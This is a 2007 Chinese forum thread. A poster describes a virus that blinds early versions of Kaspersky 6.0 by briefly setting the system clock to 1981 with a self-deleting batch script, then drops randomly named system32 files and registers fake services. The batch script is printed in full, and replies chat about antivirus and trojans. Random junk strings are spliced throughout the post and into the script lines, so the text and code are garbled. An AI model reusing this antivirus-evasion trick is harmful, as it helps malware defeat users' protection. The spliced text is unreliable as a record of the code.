找回密码
 注册

QQ登录

只需一步,快速开始

查看: 483|回复: 4

成功杀掉卡吧6.0 早期版本

[复制链接]
发表于 2007-10-26 18:26:44 | 显示全部楼层 |阅读模式
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下2 C/ r! s: O% ]- c4 B 9 |; N( }4 S* b 2如果没有安装卡巴斯基,直接运行病毒代码9 D; n! s9 A8 ^8 v 3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:) O) x2 N2 T' u# m( c   @echo off% M5 D2 i0 F2 y9 k6 W* Z   set date=%date%6 X. G3 p' b/ L3 l   date 1981-1-12( j# d* \+ ?1 B; Q7 c2 _   ping -n 45 localhost > nul: S" r( m, \8 T# b   date %date% ) p( }, B. l$ F: f3 `0 D1 W+ a% r  del %0 5 l/ h% r% l' D& G3 R. M' Y8 O   6 y9 K( S. S& r  会发现系统时间被调整到了1981112(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件( S# H( }* N/ B' N   %SystemRoot%\system32\*.EXE3 ]+ `$ D: r" m1 W8 h/ {   %SystemRoot%\system32\*T.EXE( I8 T' ~" u& V$ E9 h1 o   %SystemRoot%\system32\*.DLL! [* T5 Y* y- h/ m5 R   %SystemRoot%\system32\delme.bat; S4 Q% W, f. Q; c* K4 c4 x   (注:*为随机8位字母) - R3 t/ D( e o0 q/ x  并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。 2 [, K+ V4 k! L! D" X/ j. x3 Q  其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒 ( q: Z* G: F1 W$ x 7 `( B- p5 P8 u& p8 ]
回复

使用道具 举报

发表于 2007-10-26 18:58:52 | 显示全部楼层
嗯,没个完美的杀毒软件( s* b1 L7 P- |+ Y! P7 y7 t, C& {- q
我总是用完这个试那个。。。重不中毒
回复

使用道具 举报

发表于 2007-10-26 19:07:03 | 显示全部楼层
卡7似乎没有这个问题
回复

使用道具 举报

发表于 2007-10-26 19:16:59 | 显示全部楼层
木马算不算病毒?现在给我感觉木马比病毒还多,还烦。3 X1 ]0 W- g9 l' o8 m/ m: T( M
好歹老外搞病毒是为了耍酷,国人搞木马纯粹就是为了利益,
回复

使用道具 举报

 楼主| 发表于 2007-10-26 19:28:04 | 显示全部楼层
木马也是病毒的一种啦....反正有伤害的都算computer vires
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|=|HERO|=战队 ( 皖ICP备19020640号 )|网站地图

GMT+8, 2026-7-30 20:48

Powered by Discuz! X5.0 Licensed

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表